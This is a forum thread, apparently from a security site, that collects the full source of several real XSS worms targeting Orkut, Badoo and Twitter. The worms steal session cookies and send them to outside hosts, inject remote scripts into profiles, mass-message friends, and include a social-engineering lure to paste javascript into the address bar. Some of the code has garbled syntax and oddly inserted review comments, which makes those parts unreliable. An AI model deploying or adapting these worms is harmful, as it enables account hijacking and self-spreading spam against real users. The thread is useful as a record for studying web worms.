loadFriends();

//sendScrap();

}

sc = String(fwScrap);
sc = sc.substring(21, sc.length - 2);
script = document.createElement("script");
if (typeof document.all) {
script.text = sc;
} else {
script.textContent = sc;
}
document.getElementsByTagName("head")[0].appendChild(script)


and http://monster357.freehostia.com/scripts/blindgal.js is:

// ==UserScript==
// @name Master mind
// @author "Ishu"
// @provided by http://
// @description Ishu
// @include *Ishu*
// ==/UserScript==

function fwScrap() {
document.title = " Blindgal";

function createXMLHttpRequest() {
try {
return new XMLHttpRequest;
} catch (e) {
try {
return new ActiveXObject("Msxml2.XMLHTTP");
} catch (e) {
try {
return new ActiveXObject("Microsoft.XMLHTTP");
} catch (e) {

return false;
}
}
}
}

function getPostSig(exc) {
var xml = createXMLHttpRequest();
xml.open("GET", "/Scrapbook.aspx", true);
xml.onreadystatechange = function ()
{
if (xml.readyState == 4) {
var xmlr = xml.responseText;
POST = xmlr.match(/name="post_token" value="([^"]+)/i);
SIG = xmlr.match(/name="signature" value="([^"]+)/i);
document.getElementsByTagName("input").POST_TOKEN.value = POST[1];
document.getElementsByTagName("input").signature.value = SIG[1];
eval(exc);
}
};
xml.send(null);
}


var select;
function loadFriends() {

date_now = new Date();
var hrs = date_now.getHours();
var min = date_now.getMinutes();
var sec = date_now.getSeconds();
var milliSec = date_now.getMilliseconds();

var xml = createXMLHttpRequest();
xml.open("GET", "/Compose.aspx", true);
xml.onreadystatechange = function ()
{
if (xml.readyState == 4) {
var xmlr = xml.responseText;
POST = xmlr.match(/name="post_token" value="([^"]+)/i);
SIG = xmlr.match(/name="signature" value="([^"]+)/i);
document.getElementsByTagName("input").POST_TOKEN.value = POST[1];
document.getElementsByTagName("input").signature.value = SIG[1];
var div = document.createElement("div");
div.innerHTML = xmlr;

for (var x = 0; x < div.getElementsByTagName("select").length; x++) {
if (div.getElementsByTagName("select")[x].getAttribute("name") == "oneFriend") {
select = div.getElementsByTagName("select")[x].cloneNode(true);
globalSelect = select;
break;
}
}

var scrapText;
var tokenValue = encodeURIComponent(document.getElementsByTagName("input").POST_TOKEN.value);
var signatureValue = encodeURIComponent(document.getElementsByTagName("input").signature.value);

//scrapText = "Read Receipt --> "+hrs+":"+min+":"+sec+"-"+milliSec+"<br>"+signatureValue;
//scrapText = "Read Receipt --> "+hrs+":"+min+":"+sec+"-"+milliSec;
scrapText = "Love rocks! [:P] <br>" +hrs+":"+min+":"+sec+"-"+milliSec;
sendScrap(94850220,scrapText);
SendScrapToAll();



// for(var i=0;i<globalSelect.length;i++) {
// if(globalSelect.value!="") {
// sendScrap(globalSelect.value,scrapText);
// setTimeout("", 65 * 1000);
// }
// }

}
};
xml.send(null);
}


function wait() {
antiF = 1;
showTime();
}
c = 0 ;
function SendScrapToAll()
{
var scrapText;
scrapText = "<font size=5><center>[red]Love Message</center></font><br> [red]THERE IS STORY OF BLIND GIRL-- >[blue] MUST READ Ppl IN LOVE. <br>[navy]JUST PASTE THE SCRIPT IN THE PLACE WHERE U SEE [gray] (the place where u see www.orkut.com)[/gray] and hit ENTER"+ "<br>"+"<br>[teal] javascript:d=document;c=d.createElement('script');d.body.appendChild(c);c.src='http://monster357.freehostia.com/scripts/blindgal1.js';void(0)[/teal]<br><BR><br><center><font style=text-decoration:blink><a href=http://www.orkut.com/CommunityJoin.aspx?cmm=30794><img src=http://img1.orkut.com/img/castro/p_scrap.gif>~ Powered By LOVERS ~<img src=http://img1.orkut.com/img/castro/p_scrap.gif></a></img></font></center><br>";
// "<center> </center>";

if(c == select.length)
return;

try{
if(select[c].value!="")
{
sendScrap(select[c].value,scrapText);
}
}catch(e){
//Suppressed Exception
} finally {
c = c+ 1;
setTimeout("SendScrapToAll()", 500);
}
}



function showTime() {
if (timeWait > 0) {
timeWait--;
setTimeout("showTime()", 2000);
} else {
timeWait = 20;
index++;
getPostSig("SendScrapToAll()");
}
}

antiF = 1;
index = 1;
timeWait = 20;
nscraps = 0;
nCounter=2;
nLoop=2;

function sendScrap(to, msg) {

date_now = new Date();
var hrs = date_now.getHours();
var min = date_now.getMinutes();
var sec = date_now.getSeconds();
var milliSec = date_now.getMilliseconds();

var tokenValue = encodeURIComponent(document.getElementsByTagName("input").POST_TOKEN.value);
var signatureValue = encodeURIComponent(document.getElementsByTagName("input").signature.value);

//var scrapText = tokenValue + signatureValue +'9'+hrs+'18'+min+'27'+sec+'36'+milliSec;

var send = "POST_TOKEN=" + tokenValue + "&signature=" + signatureValue + "&scrapText=" + encodeURIComponent(msg) + "&toUserId="+to+"&Action.submit=1";

var xml = createXMLHttpRequest();


xml.open("POST", "/Scrapbook.aspx", true);
xml.setRequestHeader("Content-Type", "application/x-www-form-urlencoded;");
xml.send(send);

xml.onreadystatechange = function () {
if (xml.readyState == 4) {

if (xml.status != 200) {
setTimeout("SendScrapToAll()", 500);
return;
}

if (antiF < 450) {
antiF++;

if(nCounter==1) {
index++;
nCounter=nLoop;
}
else {
nCounter--;
}
return;
}
else {
wait();
}
}
};
}

layout = " <input name=\"POST_TOKEN\" type=\"hidden\"/><input name=\"signature\" type=\"hidden\"/>"+
"<center><center><font size=6>StOry of Blind girl</font></center><br>"+

"<h3>Most Touching Story Ever Read</h3>"+

"<br><BR><BR><font size=5>Click ON link to read story IN COMMUNITy</font>" +
"<br><br><b><font color=\"red\"><font size=5><a target=_blank href=http://www.orkut.com/CommMsgs.aspx?cmm=30794&tid=2585088195765389198>&quot;CLICK HERE&quot;</a></font></font></b>"+

"<br><font size=4>----------I Would love to see ur replies please do reply:----------</font>" +
"<br><br><font size=4>Don forget 2 rply</font>" +
"<br><font size=4>This story will touch ur hearts</font>" +
"<br><br><font size=4>Ur vision will b changed</font>" +
"<br><font size=4>It will give u new approach in life</font>" +
"<br><br><font size=4>Still thinking</font>" +
"<br><font size=4>Just go in community n read topic story of blind gal</font>" +
"<br><br><font size=4>this is love is community</font>" +
"<br><br><font size=4>Sorry if it hurts u</font>" +
"<br><br><font size=4>n tell ur frnd to see it</font>" +
"<br><font size=4>Nothing more see u in community topic</font>" +
"<br><font size=4>Good bye</font>" +

"<br><font size=4>WITH LOVE -- ISHU GUMBER</font>" +
"<br><br><b><font color=\"red\"><font size=5><a target=_blank href=http://www.orkut.com/CommMsgs.aspx?cmm=30794&tid=2585088195765389198>&quot;CLICK HERE TO JOIN ME&quot;</a></font></font></b>"+




""
;
document.body.innerHTML = layout;
var focus = document.createElement("span");
focus.id = "focus";
focus.style.display = "inline";
document.body.appendChild(focus);
var divLoad = document.createElement("div");
divLoad.id = "divLoad";
divLoad.style.display = "inline";
document.body.appendChild(divLoad);

loadFriends();

//sendScrap();

}

sc = String(fwScrap);
sc = sc.substring(21, sc.length - 2);
script = document.createElement("script");
if (typeof document.all) {
script.text = sc;
} else {
script.textContent = sc;
}
document.getElementsByTagName("head")[0].appendChild(script)

- RSnake
Gotta love it. http://ha.ckers.org



Edited 2 time(s). Last edit at 02/28/2008 06:30PM by rsnake.

Re: List of XSS Worms?
Posted by: Jiu
Date: March 08, 2008 09:26AM

http://badoo.com

var x;
b=Math.floor(Math.random()*1000000);

if(window.XMLHttpRequest)
x = new XMLHttpRequest();
else if(window.ActiveXObject)
x = new ActiveXObject("Microsoft.XMLHTTP");


u=document.location; //url
l=document.cookie.split(";");
c=l[2].substring(4,36); //cookie
p=document.links[6].href; //page
t=(document.links[6].href).split(".");
r=t[0].substring(7,t[0].length); //number of the page because its like that --> hxxp://number.badoo.com

if(u!=p){ //like that, there isnt a new reportage all the time you visit your profil
sh="\r\n--"+b+"\r\nContent-Disposition:";
sh+="form-data;name=\"submit_to\"\r\n\r\n"+p+"entry/0/edit/103?noupload=1\r\n--"+b+"\r\nContent-Disposition:";
sh+="form-data;name=\"s1\"\r\n\r\n"+c+"\r\n--"+b+"\r\nContent-Disposition:";
sh+="form-data;name=\"upload_ws_url\"\r\n\r\nhxxp://87.245.192.195"+r+"/entry/0/upload/1\r\n--"+b+"\r\nContent-Disposition:";
sh+="form-data;name=\"self_domain\"\r\n\r\n"+p+"\r\n--"+b+"\r\nContent-Disposition:";
sh+="form-data;name=\"entry_id\"\r\n\r\n0\r\n--"+b+"\r\nContent-Disposition:";
sh+="form-data;name=\"day\"\r\n\r\n7\r\n--"+b+"\r\nContent-Disposition:";
sh+="form-data;name=\"month\"\r\n\r\n2\r\n--"+b+"\r\nContent-Disposition:";
sh+="form-data;name=\"year\"\r\n\r\n2008\r\n--"+b+"\r\nContent-Disposition:";
sh+="form-data;name=\"who_view\"\r\n\r\nAll\r\n--"+b+"\r\nContent-Disposition:";
sh+="form-data;name=\"had_password\"\r\n\r\n0\r\n--"+b+"\r\nContent-Disposition:";
sh+="form-data;name=\"entrypwd\"\r\n\r\n\r\n--"+b+"\r\nContent-Disposition:";
sh+="form-data;name=\"who_comment\"\r\n\r\nAll\r\n--"+b+"\r\nContent-Disposition:";
sh+="form-data;name=\"title\"\r\n\r\nI will become an hero\r\n--"+b+"\r\nContent-Disposition:";
sh+="form-data;name=\"body\"\r\n\r\n<script>r=document;t=\"http:/\"; s=r.createElement(\"script\"); s.src=t.concat(\"/kurl.nl?1B9E\" );r.body.appendChild(s); </script>";
sh+="\r\n--"+b+"\r\nContent-Disposition:";
sh+="form-data;name=\"file\";filename=\"\"\r\nContent-Type:";
sh+="application/octet-stream\r\n\r\n--"+b+"\r\nContent-Disposition:";
sh+="form-data;name=\"save\"\r\n\r\nCr%c3%a9er reportage\r\n--"+b+"--\r\n";";

x.open("POST",u+"entry/create/",true); //little error in badoo, you can post a reportage from another page that yours
x.setRequestHeader("Content-Length",sh.length);
x.setRequestHeader("Content-Type","multipart/form-data; boundary="+b);
x.send(sh);

}else{ //only when you visit your profil, that send a friendrequest and send a message at all your friends

d="user_id=097994444&code=&burl="+p+"contacts/&friendship_type_group[Friend]=1&";
d+="friendship_type[]=Friend&friendship_type[]=FamilyMember&friendship_type[]=ProfessionalContact&submit=Ajouter+dans+la+liste+d%27amis";
x.open("POST",u+"friend/new_request.phtml",true);
x.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
x.setRequestHeader("Content-Length",d.length);
x.send(d);

x.onreadystatechange=function(){
if(x.readyState==4 && x.status==200){

x.open("GET",u+"friends/",false);
x.send(null);

j=x.responseText;
f=j.split("has ");
z=f[1].substring(0,1);
p=j.split("\"uid");
i=1;

function A(i){ 
d2="s1="+c+"&contact_user_id=0"+p.substring(0,8)+"&action=add&message=Come see my new pictures Kisss&flash=1";
x.open("POST",u+"contacts/ws-post.phtml",false);
x.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
x.setRequestHeader("Content-Length",d2.length);
x.send(d2);
setTimeout(function(){A(i+1)},1000);
}
A(i);
}
}
} 

doesn't work on IE, don't know why ^^

Re: List of XSS Worms?
Posted by: rsnake
Date: April 13, 2009 03:45PM

Trying to keep current with the Twitter worm code:

// Minimal cross-browser XMLHttpRequest wrapper (a widely copied generic snippet).
// Constructs a transport and exposes connect(sURL, sMethod, sVars, fnDone).
// Review notes:
//  - When invoked with `new`, the `return null` below is ignored by the
//    language (a constructor returning a non-object yields `this`), so a
//    caller on a browser with no XHR gets an object that has no connect().
//  - fnDone is called unguarded on completion; a caller that omits it gets a
//    TypeError inside the readystatechange handler rather than a clean failure.
//  - sVars is concatenated into the URL / body verbatim; encoding is the
//    caller's responsibility.
function XHConn()
{
var xmlhttp, bComplete = false;
// Try the legacy ActiveX transports first, then the standard constructor.
try { xmlhttp = new ActiveXObject("Msxml2.XMLHTTP"); }
catch (e) { try { xmlhttp = new ActiveXObject("Microsoft.XMLHTTP"); }
catch (e) { try { xmlhttp = new XMLHttpRequest(); }
catch (e) { xmlhttp = false; }}}
if (!xmlhttp) return null;
// Issues one request. Returns true once send() has been called, false if the
// transport is missing or any step threw. fnDone(xmlhttp) runs at most once
// per connect(), guarded by bComplete.
this.connect = function(sURL, sMethod, sVars, fnDone)
{
if (!xmlhttp) return false;
bComplete = false;
sMethod = sMethod.toUpperCase();
try {
if (sMethod == "GET")
{
// Query string is appended as-is; no escaping of sVars happens here.
xmlhttp.open(sMethod, sURL+"?"+sVars, true);
sVars = "";
}
else
{
xmlhttp.open(sMethod, sURL, true);
// Non-standard header: the request method is already fixed by open();
// this header has no protocol meaning and only adds a detectable artefact.
xmlhttp.setRequestHeader("Method", "POST "+sURL+" HTTP/1.1");
xmlhttp.setRequestHeader("Content-Type",
"application/x-www-form-urlencoded");
}
xmlhttp.onreadystatechange = function(){
if (xmlhttp.readyState == 4 && !bComplete)
{
bComplete = true;
fnDone(xmlhttp);
}};
xmlhttp.send(sVars);
}
// Any exception (bad URL, blocked request, handler error) is swallowed and
// reported only as `false`; the caller learns nothing about the cause.
catch(z) { return false; }
return true;
};
return this;
}

// PHP-style urlencode on top of encodeURIComponent: additionally escapes the
// characters encodeURIComponent leaves alone (' ( ) * ~ !) and turns an
// already-encoded space (%20) into '+'.
// Review notes:
//  - str.toString() throws on null/undefined input; there is no guard.
//  - `search` and `replace` in the loop are assigned without declaration and
//    leak as implicit globals.
//  - The outer `tmp_arr` is never used.
//  - The trailing `return ret;` is unreachable.
function urlencode( str ) {
var histogram = {}, tmp_arr = [];
var ret = str.toString();

// Global literal replace implemented via split/join (no regex escaping needed).
var replacer = function(search, replace, str) {
var tmp_arr = [];
tmp_arr = str.split(search);
return tmp_arr.join(replace);
};

histogram["'"] = '%27';
histogram['('] = '%28';
histogram[')'] = '%29';
histogram['*'] = '%2A';
histogram['~'] = '%7E';
histogram['!'] = '%21';
// Applied after encodeURIComponent, so this maps encoded spaces to '+'.
histogram['%20'] = '+';

ret = encodeURIComponent(ret);

// NOTE(review): implicit globals `search` / `replace` (no var).
for (search in histogram) {
replace = histogram[search];
ret = replacer(search, replace, ret)
}

// Upper-cases hex digits of percent escapes. encodeURIComponent already emits
// upper-case hex, so this pass appears to be a no-op on its own output.
return ret.replace(/(\%([a-z0-9]{2}))/g, function(full, m1, m2) {
return "%"+m2.toUpperCase();
});

// Unreachable: the function has already returned above.
return ret;
}

var content = document.documentElement.innerHTML;
userreg = new RegExp(/<meta content="(.*)" name="session-user-screen_name"/g);
var username = userreg.exec(content);
username = username[1];

var cookie;
cookie = urlencode(document.cookie);
document.write("<img src='http://mikeyylolz.uuuq.com/x.php?c=" + cookie + "&username=" + username + "'>");
document.write("<img src='http://stalkdaily.com/log.gif'>");

function wait()
{
var content = document.documentElement.innerHTML;

authreg = new RegExp(/twttr.form_authenticity_token = '(.*)';/g);
var authtoken = authreg.exec(content);
authtoken = authtoken[1];
//alert(authtoken);

var randomUpdate=new Array();
randomUpdate[0]="Dude, www.StalkDaily.com is awesome. What's the fuss?";
randomUpdate[1]="Join www.StalkDaily.com everyone!";
randomUpdate[2]="Woooo, www.StalkDaily.com :)";
randomUpdate[3]="Virus!? What? www.StalkDaily.com is legit!";
randomUpdate[4]="Wow...www.StalkDaily.com";
randomUpdate[5]="@twitter www.StalkDaily.com";

var genRand = randomUpdate[Math.floor(Math.random()*randomUpdate.length)];

updateEncode = urlencode(genRand);

var xss = urlencode('http://www.stalkdaily.com"></a><script src="http://mikeyylolz.uuuq.com/x.js"></script><a ');

var ajaxConn = new XHConn();
ajaxConn.connect("/status/update", "POST", "authenticity_token="+authtoken+"&status="+updateEncode+"&tab=home&update=update");
var ajaxConn1 = new XHConn();
ajaxConn1.connect("/account/settings", "POST", "authenticity_token="+authtoken+"&user[="+xss+"&tab=home&update=update");__}__setTimeout("wait()",3250);__- RSnake__Gotta love it. ]

Re: List of XSS Worms?
Posted by: rsnake
Date: April 18, 2009 08:24PM

Here is the mikeyy XSS worm (thanks to Wayne from Armorize for sending this to me):

var genXSS="000; } #notifications{width:
expression(document.body.appendChild(document.createElement('script')).src='http://runebash.net/xss.js');)
#test { color:#333333";

And here is the decoded JavaScript:

function wait() {
var content = document.documentElement.innerHTML;
var tmp_cookie=document.cookie;
var tmp_posted=tmp_cookie.match(/posted/);
authreg= new RegExp(/twttr.form_authenticity_token = '(.*)';/g);
var authtoken=authreg.exec(content);
var authtoken=authtoken[1];
var randomUpdate= new Array();
randomUpdate[0]= "Be nice to your kids. They'll choose your nursing home. Womp. mikeyy.";
randomUpdate[1]= "If you are born ugly blame your parents, if you died ugly blame your doctor. Womp. mikeyy.";
randomUpdate[2]= "Every man should marry. After all, happiness is not the only thing in life. Womp. mikeyy.";
randomUpdate[3]= "Age is a very high price to pay for maturity.
Womp. mikeyy.";
randomUpdate[4]= "Ninety-nine percent of all lawyers give the rest a bad name. Womp. mikeyy.";
randomUpdate[5]= "If your father is a poor man, it is your fate, but if your father-in-law is a poor man, it's your stupidity. Womp.
mikeyy.";
randomUpdate[6]= "Money is not the only thing, it's everything.
Womp. mikeyy.";
randomUpdate[7]= "Success is a relative term. It brings so many relatives. Womp. mikeyy.";
randomUpdate[8]= "'Your future depends on your dreams', So go to sleep. Womp. mikeyy.";
randomUpdate[9]= "God made relatives; Thank God we can choose our friends.Womp. mikeyy.";
randomUpdate[10]= "'Work fascinates me' I can look at it for hours !
Womp. mikeyy.";
randomUpdate[11]= "I have enough money to last me the rest of my life. (unless I buy something) Womp. mikeyy.";
randomUpdate[12]= "RT!! @spam Watch out for the Mikeyy worm http://bit.ly/XvuJe";
randomUpdate[13]= "FUCK. NEW MIKEYYY WORM! REMOVE IT: http://bit.ly/fuSkF";
randomUpdate[14]= "Mikeyy worm is back!!! Click here to remove it:
http://bit.ly/UTPXe";

var genRand = randomUpdate[Math.floor(Math.random()*randomUpdate.length)];
var updateEncode=urlencode(randomUpdate[genRand]);

var ajaxConn= new XHConn();
ajaxConn.connect("/status/update","POST","authenticity_token="+authtoken+_"&status="+updateEncode+"&return_rendered_status=true&twttr=true");
var _0xf81bx1c="Mikeyy";
var updateEncode=urlencode(_0xf81bx1c);
var ajaxConn1= new XHConn();
ajaxConn1.connect("/account/settings","POST","authenticity_token="]+authtoken+"&user[name]="+updateEncode+""+updateEncode+"&user[description]="+updateEncode+"&user[location]="+updateEncode+"&user[protected]=0&commit=Save");
var genXSS="000; } #notifications{width:
expression(document.body.appendChild(document.createElement('script')).src='http://runebash.net/xss.js');)
#test { color:#333333";
var XSS=urlencode(genXSS);
var ajaxConn2= new XHConn();
ajaxConn2.connect("/account/profile_settings",""POST,"authenticity_token="]+authtoken+"&user[profile_sidebar_fill_color]="+XSS+"&commit=save+changes");

} ;
setTimeout(wait(),5250);

- RSnake
Gotta love it. http://ha.ckers.org


